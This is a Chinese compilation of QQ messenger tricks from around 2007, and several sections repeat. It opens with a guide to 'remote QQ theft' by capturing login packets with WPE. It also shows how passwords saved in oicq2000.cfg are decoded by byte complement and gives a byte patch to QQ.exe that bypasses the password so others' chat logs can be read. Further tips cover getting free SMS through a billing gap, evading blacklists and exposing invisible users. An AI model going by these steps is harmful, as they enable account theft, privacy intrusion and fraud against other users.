._____让人看不懂的QQ技巧2007版
远程盗QQ,不用木马先说明:不支持任何人去做小偷!
这个方法什么号都可以盗,只要是号!!!!!
首先,我们要用到wpe 你别说你不知道是什么,这是一个拦截个修改封包数据的工具,很好用哦
好我们先演示一下WPE的使用,便于初次使用的朋友学习
先启动这个IE,然后进入WPE选择 IEXPLORE。EXE这个程序
就是白色字那个了,我们选定它,作为我们研究的对象!然后是发送封包接收封包的问题了,为了从最简单的入手,我们先把网线拔了,什么
?不明白网线是什么?那我无法说明了,你别问我,问旁边的人吧,一定有人知道的,反正就是你上网那根线,先把它拔下来,这样就没有封
包返回,方便研究!下面看看,我们从最简单的入手,首先我们发送一个地址,就在IE中输入地址,然后按回车,这里我们输入的地址是:
http://fengyes.con.cn/结果看到了吧,右边有封包的分析,对于简单的未加密的封包,WPE可以自动分析,下面我们输入地址:
http://fengyes.con.cn/ 结果又看到了哦
这是第一步如果你顺利完成,看下一步,分析封包了哦,注意~
我们比较一下两个封包,可以发现,相同的部分很多,按我们的分析应该差别只应该在“ee”与"ff"的区别,因为发送的内容只有这点差别,
但是上面的封包显示出来的却不是这样,为什么?
其实,他们确实是一样的,在IE的封包里面,01、02、03、04都代表点的意思,也就是代表:"."这个意思,那么你再分析就发现完全和我们预
料的一样了,这里是IE发送的封包,没有加密的,您可以直接读出来的!但是这不是10进制,而是16进制,因此,我们必须把它翻译成为10进
制,以方便我们阅读,怎么办?
别忘了,我在WPE下载页给出了一个Asic II工具,现在就用吧,
好,我们来翻译这个封包,前面的不管,我们只关心封包里面的数据:打开Asic II工具,输入"W",点查看,看到了什么?------“77”(十六
进制),看到了吧,我们输入的有3个“W”,这里是不是有3个77啊?前面已经讲过,02代表点号,那么,接下来是不是也是我们预料的是“f
”呢?我们继续用工具查一下看看,果然不出我们分析所料,真是f,不用多猜了,接下来的内容就是".com"怎么样?是不是很简单呢?
还不懂?**,那我还讲一次吧
在Internet Exproler中输入http://fengyes.con.cn/,然后按回车
在WPE中点拦截
点三角形
收到封包后点红色的正方形,封包就出现了
们来分析一下上面的内容!
首先几点说明,这是对Internet Exproler进行的封包操作,请求的地址暂时不说,您可以分析出来的!下面是分析说明!
首先,本地发送请求到服务器!发送内容是“21”,注意:您一定很容易地认为发送的是“21”,其实,数字也好,字母也好,一定要注意,
全都是16进制的,所以,这个“21”不是我们平常的21,而是16进制的21,那我们来算一下21等于多少(计算21转换为10进制等于多少)?21
(16位)=2 x 16 + 1 = 33 (10进制),关于进制计算,我们专门的章节有说明的
再查ASCII表,看看33对应的是什么字符?查到了吗?是“!”,呵呵,WPE不是已经在右边给我们显示了吗?不过我们要习惯分析哦,到游戏
里面可就没那么多的方便了!
那么发送一个!是什么意思呢?其实这个是网络连接的问题了,不必细究,要详细了解的请查看关于网络连接3次握手的相关内容!这里不做讲
解!这个与游戏修改无关!
第3行47是什么意思呢?算一下:47(16)=4 x 16 + 7 = 71(10)括号内16代表16进制,10代表10进制,那么71代表什么?查表ASCII结果:
71对应字母“G”
45呢?45(16)=4 X 16 +5 =69(10),查表出来的结果是:E
请你不要看右边的分析,我知道右边有现成的结果,但是你要自己分析,不然你拿着游戏就无从下手了!简单的分析就是这样了,是不是很轻
松?好,再继续分析几个!
第15行,的3A什么意思?
3A(16)=3 X 16 + 10 = 58(10)
查表得,58对应“ :”
倒数第2行B7什么意思?
B7(16)=11 X 16 + 7 =183(10)
查表得到183对应:特殊字符,这里我无法帮你打出这个字符,抱歉!
注意,这里WPE也翻译不出来对应的字符了,看到了吗?WPE只翻译了最后两个,如果我们自己需要怎么办?当然是自己分析了,所以说不要看
WPE帮你的分析,自己分析很重要
同样,盗QQ也简单嘛~~拦截他对服务器所发送的登陆封包数据,看看,分析一下,密码来了,脱离木马的感觉爽吗,哈哈~ QQ密码的穿墙术
我们在一台电脑登录过QQ之后,下次启动QQ的时候就会看到在号码列表的下拉菜单中会出现这个号码,这些号码实际上都保存在QQ安装目录的
“dat\oicq2000.cfg”文件里,用记事本打开这个文件就会看到所有保存过的号码了。为了防备这种登录软件,有人建议删除“oicq2000.cfg
”文件,其实这是完全没有必要的,只要删除了相应的号码文件夹就可以了。否则,一用QQ就要重新启动注册向导,岂不是很麻烦。
一、发现秘密
删除了QQ的文件夹之后就OK了么?我们还是来研究一下这个“oicq2000.cfg”文件吧。用任何一种16进制编辑器打开这个文件(推荐使用
UltraEdit),假如我们打开一个保存有(123456、222222、333333、444444、745370)5个号码的“oicq2000.cfg”文件,就会看到如图1的内
容。说明一下,第九位的“05”表示这个列表文件中共有5个号码,之后用3个“00”做分隔符,之后的“06”是列表中第一个QQ号码的位数
(16进制的31 32 33 34 35 36正好是1 2 3 4 5 6)。紧跟其后的就是下一个QQ号码的位数,如此循环,最后几位就是列表中最后一个QQ的号
码。
大家都知道QQ有个功能叫做“记住密码”,选择了该项之后下次启动QQ便可以直接登录而不用自己输入密码,其实这个功能简直就是QQ自
杀术。假如我们上面的列表中号码123456的密码为my7g.com,保存之后我们再打开列表文件,发现变化了么?第一位变为了01,其实第一位是
个判断符号,00表示未保存密码,反之01就是保存了密码,然后是分隔符,接着的08表示保存的密码的位数,然后是分隔符,接着就是保存的
密码了,这8位是“92 86 c8 98 d1 9c 90 92”,我们的密码是my7g.com,字符的ASCII码的16进制值应该是“6d 79 37 67 2e 63 6f 6d”,
对比一下:
92 86 c8 98 d1 9c 90 92
6d 79 37 67 2e 63 6f 6d
发现什么了(什么都没发现?再看看!)?上面的每一位和下面相对应的相加都是FF,所以,只要是保存到“oicq2000.cfg”文件中的密码都是可以轻易地被破解的。这下你害怕了吧?这可比被人用“QQ穿墙术”看你的聊天记录更可怕。
二、解决方法
别担心,送你个软件防防身。在下载一个“QQ列表大师”,该软件只有27K,VB6制作,无须安装,复制到QQ安装目录即可运行。启动后自动检测列表文件,发现保存的密码会作出警告,并将密码显示在程序主界面。该软件还可以帮你完全自己定制QQ号码列表文件(这下子不用去算什么16进制了),并且可以帮你清除保存的密码。选定了号码之后如果同时选择了删除文件夹的复选框之后点击删除按钮的话,还可以在列表中删除号码的同时删除该号码的文件夹,这下子你放心了吧?更厉害的是该软件可以在没有“oicq2000.cfg”文件的情况下自己生成一个列表文件 QQ密码的穿墙术
我们在一台电脑登录过QQ之后,下次启动QQ的时候就会看到在号码列表的下拉菜单中会出现这个号码,这些号码实际上都保存在QQ安装目录的
“dat\oicq2000.cfg”文件里,用记事本打开这个文件就会看到所有保存过的号码了。为了防备这种登录软件,有人建议删除“oicq2000.cfg
”文件,其实这是完全没有必要的,只要删除了相应的号码文件夹就可以了。否则,一用QQ就要重新启动注册向导,岂不是很麻烦。
一、发现秘密
删除了QQ的文件夹之后就OK了么?我们还是来研究一下这个“oicq2000.cfg”文件吧。用任何一种16进制编辑器打开这个文件(推荐使用
UltraEdit),假如我们打开一个保存有(123456、222222、333333、444444、745370)5个号码的“oicq2000.cfg”文件,就会看到如图1的内
容。说明一下,第九位的“05”表示这个列表文件中共有5个号码,之后用3个“00”做分隔符,之后的“06”是列表中第一个QQ号码的位数
(16进制的31 32 33 34 35 36正好是1 2 3 4 5 6)。紧跟其后的就是下一个QQ号码的位数,如此循环,最后几位就是列表中最后一个QQ的号
码。
大家都知道QQ有个功能叫做“记住密码”,选择了该项之后下次启动QQ便可以直接登录而不用自己输入密码,其实这个功能简直就是QQ自
杀术。假如我们上面的列表中号码123456的密码为my7g.com,保存之后我们再打开列表文件,发现变化了么?第一位变为了01,其实第一位是
个判断符号,00表示未保存密码,反之01就是保存了密码,然后是分隔符,接着的08表示保存的密码的位数,然后是分隔符,接着就是保存的
密码了,这8位是“92 86 c8 98 d1 9c 90 92”,我们的密码是my7g.com,字符的ASCII码的16进制值应该是“6d 79 37 67 2e 63 6f 6d”,
对比一下:
92 86 c8 98 d1 9c 90 92
6d 79 37 67 2e 63 6f 6d
发现什么了(什么都没发现?再看看!)?上面的每一位和下面相对应的相加都是FF,所以,只要是保存到“oicq2000.cfg”文件中的密码都是可以轻易地被破解的。这下你害怕了吧?这可比被人用“QQ穿墙术”看你的聊天记录更可怕。
二、解决方法
别担心,送你个软件防防身。在下载一个“QQ列表大师”,该软件只有27K,VB6制作,无须安装,复制到QQ安装目录即可运行。启动后自动检测列表文件,发现保存的密码会作出警告,并将密码显示在程序主界面。该软件还可以帮你完全自己定制QQ号码列表文件(这下子不用去算什么16进制了),并且可以帮你清除保存的密码。选定了号码之后如果同时选择了删除文件夹的复选框之后点击删除按钮的话,还可以在列表中删除号码的同时删除该号码的文件夹,这下子你放心了吧?更厉害的是该软件可以在没有“oicq2000.cfg”文件的情况下自己生成一个列表文件 luke 2007-09-28 15:36
QQ使用的七大非常规秘籍
1.改变真实地理位置
大家知道,现在很多QQ都是显示IP和地理位置的版本,这样一来,自己的位置就暴露了。其实想隐藏自己的位置也简单,只要用代理服务
器就是了。不要把它看成很复杂的东西,建议去下载“QQ代理公布器”,推荐选择使用http的代理而不是SOCKS,因为前者的速度比后者要快得
多。找到有用的代理后,在网络设置里面选择上网类型为“局域网接入”(不管现实是不是这样),再在下面选择使用代理服务器,填入地址
和端口号(这些代理公布器里都有的),确定就可以了。
2.唤醒游戏中的Q友
有时候我们给在线好友一连发了几条消息结果对方一点反应也没有,那么八成他是在挂着QQ玩游戏了。如何把他从游戏中唤出来呢?简单
!只要“邀请对方语音视频聊天”,或者“发送文件给对方”,这时对方的QQ窗口会自动跳出来,对方想不看见也难!对绝大部分游戏都有效
!
3.逼迫隐身的好友现身
这里介绍一个比较简单的方法,就是“邀请对方语音视频聊天”或者“发送文件给好友”,如果对方确实在线的话,他接受那么当然就知
道了;如果他选择“拒绝”,你同样知道对方在线,因为你的窗口会有提示。最绝的是,即使对方既不接受也不拒绝,仅仅是把弹出的窗口关
闭,你的窗口同样会有对方拒绝的提示!哈哈,换句话说,对方要想继续隐身,只有把那个窗口最小化,这可是浪费系统资源的也~~~万般无奈
之下,我想他会现形的*^_^*
4.这条是针对对方使用了第3条秘计后的反击措施
呵呵。如果我就是要隐身,同时又不想开着那个邀请窗口占用资源,那么该怎么办呢?别急,听我道来。他狠我更狠!遇到对方邀请的时
候,你不要关闭那个窗口,直接让QQ下线,然后再关闭那个邀请窗口,这时由于自己已经下线,你的举动不会反映到对方的窗口。然后再隐身
上线就是了,对方还是在痴痴等待一无所知,而你这边的邀请窗口已经关闭了,当然就不占用系统资源了:)
5.让对方上线后第一眼看到自己的留言弹出
方法很简单,只要留言之前,先给对方发送一个视频聊天请求,然后再取消。然后再写上留言的文字就是了。这样一来,对方启动QQ上线
后,首先跳出来的是自己留言的窗口(注意是自己跳出来的,不是点击桌面右下角图标后出来的哦)!哈哈,第一时间让她知道你的不可遏止
的思念!
6.知道对方到底是否隐身。
首先要有天网防火墙并确保已经启动。然后给对方发送文字,之后再查看防火墙里面的历史记录,里面记录了每一次发送的时间及对方的
IP,那么两人都是确实不在线,因为那是暂存消息的服务器的IP。如果不同,那么其中一个必然是隐身的!你可以再给其他人发文字试试看,
最终很容易就明白其是否在线。 还有一个方法就是用软件根据IP来确定对方的地理位置,如果那个地理位置和他以往的位置差不多,那就是隐
身的啦!
7.关于防止密码被木马窃取的方法
除了OOPS所说前面打一大串0的方法外,还可以不按照顺序来打。比如密码是12345,打的时候就先打入1235,再把鼠标移到3的后面,打入
4。因为木马截获的是键盘的动作,并不知道鼠标的移动,所以在幕后第三只眼看来,你的密码就是12354了。在公共场所上网时一定要注意这个问题,因为很多网吧机器都被人装了键盘记录器等软件。当然啦,你可以把输入顺序搞得更复杂些,那样别人即使截获一堆数字,也拿它毫无办法了^o^ QQ超级技术大攻略
一、将您的QQ的在线状态发布在互联网上
将您的QQ的在线状态发布在互联网上,不用加好友也可以聊天.
将您的QQ/TM的在线状态发布在互联网上;点击 QQ在线,不用加好友也可以聊天;寻找商机,广交朋友,"互动状态"给您更便捷的交互体
验。 您只需按以下步骤生成代码。"互动状态",你也能随心设置...
http://is.qq.com/webpresence/
最下面就是俺的QQ互动状态显示,怎么样的说?
二、让你的QQ永不怕回收
腾讯官方网站说是 普通号码 资料空白 里边好友无或者过少 等等几条信息吧 说是三个月不登陆腾讯有权收回号码;那么是什么收走QQ号
呢? 是被腾讯的专业扫号程序计算机给你扫走了。密码都是16位的随机密码?
告诉你个秘密,QQ永不怕回收。
1.去腾讯主站下载个英文版本的QQ
2.安装后登陆你的那些不想管理的垃圾号码
3.记得选择资料选择性别,原始资料是男的选择F 原始资料是女的选择M
4.然后把资料里边的:这家伙很懒 什么也没有留下删除,记得随手打上“ —”
5.照着腾讯的被回收的号码资料 例如:1979314这个号码 在资料里照搬依次打上 —
6.是最重要的一条:设置16位数的密码,字母加数字组合再用中文版本登陆查看号码资料 年龄34 性别 无
这样就OK 了,永远不怕被回收了,可以安全的躲避过,腾讯的计算机系统扫描回收,对号码大户很有用,免得定期登陆的麻烦。
三、QQ使用的七大非常规秘籍
1.改变真实地理位置
大家知道,现在很多QQ都是显示IP和地理位置的版本,这样一来,自己的位置就暴露了。其实想隐藏自己的位置也简单,只要用代理服务
器就是了。不要把它看成很复杂的东西,建议去下载“QQ代理公布器”,推荐选择使用http的代理而不是SOCKS,因为前者的速度比后者要快得
多。找到有用的代理后,在网络设置里面选择上网类型为“局域网接入”(不管现实是不是这样),再在下面选择使用代理服务器,填入地址
和端口号(这些代理公布器里都有的),确定就可以了。
2.唤醒游戏中的Q友
有时候我们给在线好友一连发了几条消息结果对方一点反应也没有,那么八成他是在挂着QQ玩游戏了。如何把他从游戏中唤出来呢?简单
!只要“邀请对方语音视频聊天”,或者“发送文件给对方”,这时对方的QQ窗口会自动跳出来,对方想不看见也难!对绝大部分游戏都有效
!
3.逼迫隐身的好友现身
这里介绍一个比较简单的方法,就是“邀请对方语音视频聊天”或者“发送文件给好友”,如果对方确实在线的话,他接受那么当然就知
道了;如果他选择“拒绝”,你同样知道对方在线,因为你的窗口会有提示。最绝的是,即使对方既不接受也不拒绝,仅仅是把弹出的窗口关
闭,你的窗口同样会有对方拒绝的提示!哈哈,换句话说,对方要想继续隐身,只有把那个窗口最小化,这可是浪费系统资源的也~~~万般无奈
之下,我想他会现形的*^_^*
4.这条是针对对方使用了第3条秘计后的反击措施
呵呵。如果我就是要隐身,同时又不想开着那个邀请窗口占用资源,那么该怎么办呢?别急,听我道来。他狠我更狠!遇到对方邀请的时
候,你不要关闭那个窗口,直接让QQ下线,然后再关闭那个邀请窗口,这时由于自己已经下线,你的举动不会反映到对方的窗口。然后再隐身
上线就是了,对方还是在痴痴等待一无所知,而你这边的邀请窗口已经关闭了,当然就不占用系统资源了:)
5.让对方上线后第一眼看到自己的留言弹出
方法很简单,只要留言之前,先给对方发送一个视频聊天请求,然后再取消。然后再写上留言的文字就是了。这样一来,对方启动QQ上线
后,首先跳出来的是自己留言的窗口(注意是自己跳出来的,不是点击桌面右下角图标后出来的哦)!哈哈,第一时间让她知道你的不可遏止
的思念!
6.知道对方到底是否隐身。
首先要有天网防火墙并确保已经启动。然后给对方发送文字,之后再查看防火墙里面的历史记录,里面记录了每一次发送的时间及对方的
IP,那么两人都是确实不在线,因为那是暂存消息的服务器的IP。如果不同,那么其中一个必然是隐身的!你可以再给其他人发文字试试看,
最终很容易就明白其是否在线。 还有一个方法就是用软件根据IP来确定对方的地理位置,如果那个地理位置和他以往的位置差不多,那就是隐
身的啦!
7.关于防止密码被木马窃取的方法
除了OOPS所说前面打一大串0的方法外,还可以不按照顺序来打。比如密码是12345,打的时候就先打入1235,再把鼠标移到3的后面,打入
4。因为木马截获的是键盘的动作,并不知道鼠标的移动,所以在幕后第三只眼看来,你的密码就是12354了。在公共场所上网时一定要注意这
个问题,因为很多网吧机器都被人装了键盘记录器等软件。当然啦,你可以把输入顺序搞得更复杂些,那样别人即使截获一堆数字,也拿它毫
无办法了^o^
四、QQ强制聊天代码
QQ强制聊天代码,把代码中的红色的“********”星号换成你想与其聊天的QQ号即可。
代码如下:
http://wpa.qq.com/msgrd?V=1&Uin=********&Site=ioshenmue&Menu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的QQ号后复制到浏览器的地址栏处即可。无论他是否你的好友,你无须
加他为好友就能给他发QQ消息。
五、不用密码查看本地别人的QQ聊天记录(请不要窥探别人的隐私)
由于QQ2004的代码与以前大不一样,直接导致有些过去常用的QQ技巧也随之失效了。因此本文技巧只针对QQ2004,没有QQ密码是无法查看
QQ聊天记录的。如果你忘了密码利用下面这个小技巧就可以实现无密码看QQ2004聊天记录,可以是你所用电脑上的任何QQ号码哦!
下载并安装16进制文件编辑器UltraEdit,运行UltraEdit,单击“文件/打开”,出现“打开”对话框,在“查找范围”栏内选择QQ所在文
件夹,在“文件名”栏中输入QQ.exe,单击“打开”按钮将QQ.exe文件加载到UltraEdit中来。 接下来单击“搜索”菜单中的“查找”,出现
“查找”对话框,在该对话框的“查找内容”一栏中输入以下代码:0F849D000000,单击“查找下一个”按钮就会在UltraEdit的主窗口中找到
上述代码,把光标定位到中间的十六进制代码区,把上述代码改为E99E00000090,单击工具栏上的“保存”按钮保存修改结果,最后退出
UltraEdit即可。
运行QQ,出现QQ号码登陆窗口,在“QQ号码:”中选择已经忘记了密码的那个QQ号,在“QQ密码:”中随意输入任意字符或什么都不用输入
,直接点击“登陆”按钮就可以进入QQ中,此时你就可以随意查看、导出QQ聊天记录了。
六、用最简单的方法让QQ上的好友露出原形
现在使用QQ的朋友,越来越注重保护自己的个人信息,如果对方将个人资料设置为保密你就无法看到对方的资料了,而这位好友如果又有
着不断变换昵称的不良习惯,那么随着QQ好友名单的不断增加,时间一长,你还能分出谁是谁吗?下面就教你用一个比较简单的方法快速查看
好友的信息,打开IE浏览器,在地址栏中输入search.tencent.com/cgi-bin/friend/user_show_info?ln=000000,其中000000代表你想查看好
友的QQ号,按下回车键,怎么样,好友的资料就在眼前。
七、qq等级,我教你算!
QQ2004中加入了QQ等级这个东东,用QQ的时间越长,等级越高,从小到大依次为星星、月亮、太阳,四个星星换一个月亮,四个月亮换一
个太阳!
累积到第N级所需的在线时长可通过如下公式计算:
第N级所需累积的在线时长=5N2+15N
现在都流行挂QQ了
八、介绍用QQ看电视的方法
用QQ看电视的方法:
首先,你的QQ要QQ2003版本以上,然后登陆QQ点击QQ侧边栏的“用户自定义面板”。
然后点击“收藏”中的“设置”,在弹出的窗口对话框中选择“添加”,“链接”地址填
http://www.qq-tv.com
或者镜像站点
http://lujun1234567.myrice.com
不要忘了在“QQ-TV”上面打上“小勾”哦,这样,按下确定后你就可以欣赏QQ-TV的精彩节目了
九、快速登陆QQ
相信大家或多少都有过这样的体验,登录QQ时,小企鹅在屏幕上徒劳地闪动半天之后,弹出来的确是服务器太忙,无法登录或者超时的提
示框,接连试几次都是这样的。用下面的方法一定能让你顺利登录:
1)如果你使用的是默认的登录面板登录的话,那么你可以改用“注册向导”试试,一般情况下都能成功。
2)如果还不行,就得使用这种方法了:打开多个QQ窗口同时来登录一个号码。一般遇到上述情况时就同时打开三个窗口,这里面肯定会有
一个能登录上去的,百试不爽。
十、用QQ查看隐藏文件
有时我们在网吧上网需要查看某些文件夹,无奈管理软件却把它们给隐藏起来了,怎么也打不开。有了QQ就好办了,你可以利用它来打开
这些文件夹。
具体方法是:在机器中打开两个QQ号码甲和乙(如果没有两个号码,可以用注册向导,在自己号码前加一个“0”登录,登录后显示号码为
“0xxxx"),用左键在甲中点击乙的头像并选择“传送文件”,接着随便在电脑中找个小一些的,由乙来接收,很快就会接收完毕,弹出了一
个很关键的窗口,提示“文件接收完毕,是否转到文件所在目录?”这时请点击“是”按钮。现在你就可以随心所欲地查看该文件夹了。
十一、4则你不知道的QQ绝密技巧!
NO.1-普通QQ号照样可以克隆QQ好友
信大家手头都有几个备用的QQ号吧,一般都是在当初QQ我是垃圾的时候弄来的,但是有时候因为某些原因,突然要把一个QQ上的好友完全
克隆到另外一个QQ上面,这个“庞大工程”我想一般人是没有时间,也没有精力去完成它的。您先不用着急羡慕QQ会员的克隆好友功能,我们
自己动手,照样可以完成这个“不可能的任务”!
首先,我们要将自己原来的号和新号重新登陆一遍,然后以旧QQ号命名的文件夹中找到user.db数据库文件,然后复制它,接着再到新号的
文件夹里粘贴覆盖原文件,然后再登陆新号,你会发现,好友都在上面了,不过他们是永远不会上线的。先不要着急,接下来就是我们最关键的
一步了,打开好友管理器,在好友列表里选中自己想要加的人,选择多人的话要按着ctrl键, 选好后再把刚才选中的好友全拉到陌生人一栏里
,看到这里,您可能要问,为什么要删除他们啊?因为这是让他们复活的关键一步,在跳出的对话框里全部选确定,然后到陌生人一栏中,像
刚才一样选中你的好友,拉到好友列表里,复活成功,不过接下来的事情可就要让你忙一阵子了,这回要跳出好多要求好友确认的对话框,您就
慢慢点着吧,虽然这个办法有点笨拙,但是目的还是达到了。
NO.2-QQ中免费发手机短信
在正常情况下,你可以申请QQ号码和手机绑定在一起,这样便能通过QQ发送短信,而费用从你的手机费中扣除。但如果你的手机由于欠费
停机,导致手机号码被注销(当然也可以主动注销手机号),由于腾讯的数据没有和电信部门的数据同步,导致QQ傻不乎乎的并不知道你的手
机已经被注销,此时您仍旧可以使用那个以前绑定的QQ给别的手机发短信,而费用却不用你掏。所以只要有人把手机和自己的QQ号码绑定在一
起,然后注销手机号码,就可以使用该QQ号免费发送手机短信!而且发送的速度奇快!
NO.3-隐藏我的QQ,让它无影无踪!
在单位上班的时候,由于很无聊所以想上网和朋友聊天,但是却怕被老板发现,怎么办呢?虽然QQ的主界面在默认的设置中可以自动隐藏
,但是任务栏中的QQ图标呢?想把它藏起来倒也不难,方法是:右击系统托盘中的QQ图标,选择弹出菜单中的“系统参数”,将“参数设置”
中的“在任务栏显示图标”前面的“√”去掉。任务栏中的图标是不是已经没有了呢?如果同时将“总在最前面”取消选中,那隐蔽性就更强
了。自己想打开的时候怎么办?用快捷键“Ctrl+Alt+Z”呀,或者是自己设置一个快捷键。
NO.4-使对方的QQ黑名单失效
有些时候,由于自己不小心做错了一件事,或是错说了一句话,导致对方因为“一时不满”将你删除,或是拖到了黑名单中,这样我们就
无法再和对方说话了。在此,告诉大家一个让黑名单失效的方法。用这个方法,就算他把我们加入到“黑名单”中也没有用,我们还可以重新
把对方加入到自己的好友名单,仍然能够不断地给对方发送信息。原理说白了也很简单,就是利用了QQ的一个Bug,这个Bug出现在系统通过认
证这一环节上。
下面俺详细说一下。如果对方将对你拖入到了“黑名单”中,这样我们就无法再和你的好友聊天了。但如果当初他向你发送过加入请求,
那我们只要在“系统消息”中找到他向你发送请求的那条命令,按“通过验证”按钮,就可以再次把你加回到他的QQ好友名单中,这样即便他
在好友名单中将你删除,或是把你加入到“黑名单”里,这都没有关系,我们可以通过这个方法重新回到他的好友名单中。想要将我拒之门外
是不可能的。呵呵!
十二、让QQ头像永远在前
打开“个人设定”窗口,然后在自己的昵称前点一下鼠标,再按空格键插入一两个空格(不能太多了,要不然昵称就不能完整显示了),
然后点击“修改”按钮进行修改。这样,以后当对方更新了你的资料或者重新登录时,你的头像就可以排在其列表数一数二的位置了(在线的
情况下),现在对方要想不看见你都不可能了啦。
同理,想把谁放到你的好友列表顶端,就给他“改名”,在他名字前加一两个空格就行了。
十三、QQ密技==隐藏QQ摄像头的方法
不少朋友喜欢使用摄像头和好友面对面聊天,这样在对方好友QQ里自己的头像旁就被自动添加了摄像头小标志,显得很特别。可就是这小
小的摄像头带来了一种挥之不去的烦恼:只要安装了摄像头,QQ在每次登录时就会对是否安装有摄像头进行自动检测,并把这个信息发送到QQ
的服务器上;任何一位QQ的使用者都可以通过“查找”\“有摄像头的用户”发现你的行踪,要求和你进行视频聊天,因此很多网友在安装摄
像头后,始料未及地遭受了无数视频聊天请求,甚至好多是恶意的!难道说安装了摄像头就别无选择地要接受别人视频请求骚扰吗?
当QQ 2004发布后,这个问题得到了很好的解决!只要在QQ里进行简单的设置就可以把你有摄像头的秘密藏起来,方法如下:下载并安装好
最新的QQ 2004,单击QQ面板中的“菜单”\“系统设置”,然后在弹出的对话框里点击“本地安全”,把状态显示栏中的“不要把我列在在线
视频用户的列表中”一项选中,最后“确定”即可。
十四、怎样设置安全的密码
我相信每一个上网的网民都会碰到这样或那样的密码吧!
那么你所设置的密码是否安全呢?
现在大多数人都喜欢用自己的生日、身份证号码、电话号码、自己的名字等做密码,这样简单的密码记起来是很容易,但它的安全性却很低哦
。
那么什么样的密码才是安全的密码呢?
1;密码尽量复杂些,首先要避免以上的那些密码;
2;最好是家入一些字符在密码里面。
十五、彻底拒绝QQ广告
相信经常上网的朋友一定会使用QQ,不过QQ中频繁出现的广告真是很烦人,即使是会员也逃不出QQ广告的骚扰,下面就介绍一种方法,让
大家可以拒绝QQ广告的骚扰。
首先需要了解一下QQ广告是怎么出现的,QQ的安装目录Tencent下有一个AD目录,所有的Flash都要先下载到这个目录下。只要我们让文件
无法写入其中,QQ广告也就不会再出现了。
不过如果只简单的删除AD目录是没有用的,QQ会自动再次生成 这个目录。如果我们通过一个软件来使AD目录成为一个只读目录,便利任
何程序都无法写入这个目录,也就达到了我们的目的。
“电脑魔法保护”就具有这样的功能。它是一款绿色软件,解压以后就可以直接使用。
该软件可运行于Windows 95/98下,它利用了Windows底层的VxD技术,实现了对硬盘中的任意目录防删除、防改写(只读)功能。有了它,
接下来的工作就很容易了,只要把AD目录设置为只读即可。
具体方法为先点击“加入目录”,选定AD文件夹,点击“确定”把该目录加入目录保护中。为了设置AD目录的状态,还要选定AD目录,然
后点击“只读”选项。此时在“只读”状态下会出现“是”,说明AD目录已经处于只读保护状态了。
最后,点击“设置”页面,将“工作状态”下的“Windows启动时自动运行”前打上勾,这样系统启动时该程序会在后台自动运行了,AD目
录也就始终处于保护状态下了。
这一切做好后,广告就再也无法出现在AD目录中了,也就完全拒绝了QQ广告
十六、QQ号码列表里的秘密
我们在一台电脑登录过QQ之后,下次启动QQ的时候就会看到在号码列表的下拉菜单中会出现这个号码,这些号码实际上都保存在QQ安装目
录的“dat\oicq2000.cfg”文件里,用记事本打开这个文件就会看到所有保存过的号码了。为了防备这种登录软件,有人建议删除
“oicq2000.cfg”文件,其实这是完全没有必要的,只要删除了相应的号码文件夹就可以了。否则,一用QQ就要重新启动注册向导,岂不是很
麻烦。
1)、发现秘密
删除了QQ的文件夹之后就OK了么?我们还是来研究一下这个“oicq2000.cfg”文件吧。用任何一种16进制编辑器打开这个文件(推荐使用
UltraEdit),假如我们打开一个保存有(123456、222222、333333、444444、745370)5个号码的“oicq2000.cfg”文件,就会看到相关内容
。说明一下,第九位的“05”表示这个列表文件中共有5个号码,之后用3个“00”做分隔符,之后的“06”是列表中第一个QQ号码的位数(16
进制的31 32 33 34 35 36正好是1 2 3 4 5 6)。紧跟其后的就是下一个QQ号码的位数,如此循环,最后几位就是列表中最后一个QQ的号码。
大家都知道QQ有个功能叫做“记住密码”,选择了该项之后下次启动QQ便可以直接登录而不用自己输入密码,其实这个功能简直就是QQ自
杀术。假如我们上面的列表中号码123456的密码为my7g.com,保存之后我们再打开列表文件,发现变化了么?第一位变为了01,其实第一位是
个判断符号,00表示未保存密码,反之01就是保存了密码,然后是分隔符,接着的08表示保存的密码的位数,然后是分隔符,接着就是保存的
密码了,这8位是“92 86 c8 98 d1 9c 90 92”,我们的密码是my7g.com,字符的ASCII码的16进制值应该是“6d 79 37 67 2e 63 6f 6d”,
对比一下:
92 86 c8 98 d1 9c 90 92
6d 79 37 67 2e 63 6f 6d
发现什么了(什么都没发现?再看看!)?上面的每一位和下面相对应的相加都是FF,所以,只要是保存到“oicq2000.cfg”文件中的密
码都是可以轻易地被破解的。这下你害怕了吧?这可比被人用“QQ穿墙术”看你的聊天记录更可怕。
2)、解决方法
别担心,送你个软件防防身。在http://my7g.com/guard下载一个“QQ列表大师”,该软件只有27K,VB6制作,无须安装,复制到QQ安装目
录即可运行。启动后自动检测列表文件,发现保存的密码会作出警告,并将密码显示在程序主界面。该软件还可以帮你完全自己定制QQ号码列
表文件(这下子不用去算什么16进制了),并且可以帮你清除保存的密码。选定了号码之后如果同时选择了删除文件夹的复选框之后点击删除
按钮的话,还可以在列表中删除号码的同时删除该号码的文件夹,这下子你放心了吧?更厉害的是该软件可以在没有“oicq2000.cfg”文件的
情况下自己生成一个列表文件。
十七、QQ小小搞怪十一招
1、对付飘叶OICQ千夫指有妙招
飘叶OICQ千夫指属于QQ消息炸弹,通过给你发送大量的洪水信息,使你不得不下线。多数情况下,大家对付它的办法都是采用下线再上来
的方法,其实有更简单、更容易的对付它的办法,具体做法是:
启动QQ,用鼠标右键点击任务栏中的QQ图标,在弹出的菜单中选择“个人设定”,会弹出“修改用户资料”对话框,在该对话框中点击“
基本资料”标签,在“用户呢称”前加上“275297”(注意输入时没有引号);接下来在该对话框中点击“联系方法”标签,然后在“电子邮
件”栏中把你的E-mail改成作者飘叶的QQ号码“275297”就可以了。这样只要用飘叶OICQ千夫指向你发消息,他(她)的计算机就会重新启动
!那些讨厌的洪水消息当然也就被拒之门外了!
这个方法的原理就是作者飘叶在该软件中留下了后门——飘叶在程序中做了处理,屏蔽了对QQ号码“275297”的攻击,一旦该号码遭到飘
叶千夫指的攻击,就会调动程序中相关代码,重新启动攻击者的电脑!想想也真是的,作者怎么会让自己的软件攻击自己呢!
2、打造个性化的QQ声音
QQ提供了四个声音文件,分别是“客户消息”,是用来提示有好友或客户传来了消息;“系统消息”,用来提示有系统提供的消息,如果
你设置了要验证才能将你加为好友的话 ,当有人要将你加为好友时,系统就会发出该声音提示你;“新上线”,用来提示有新朋友刚刚上线;
“组”声音,在来设置组时提示用的。这四个文件都是WAV文件,如果要修改它们,可按以下方法实现:
①首先,将制作好的声音文件(WAV格式的)存放到Programe files oicqsound文件夹中,当然也可以放到其他文件夹中,这是为了查找方
便。
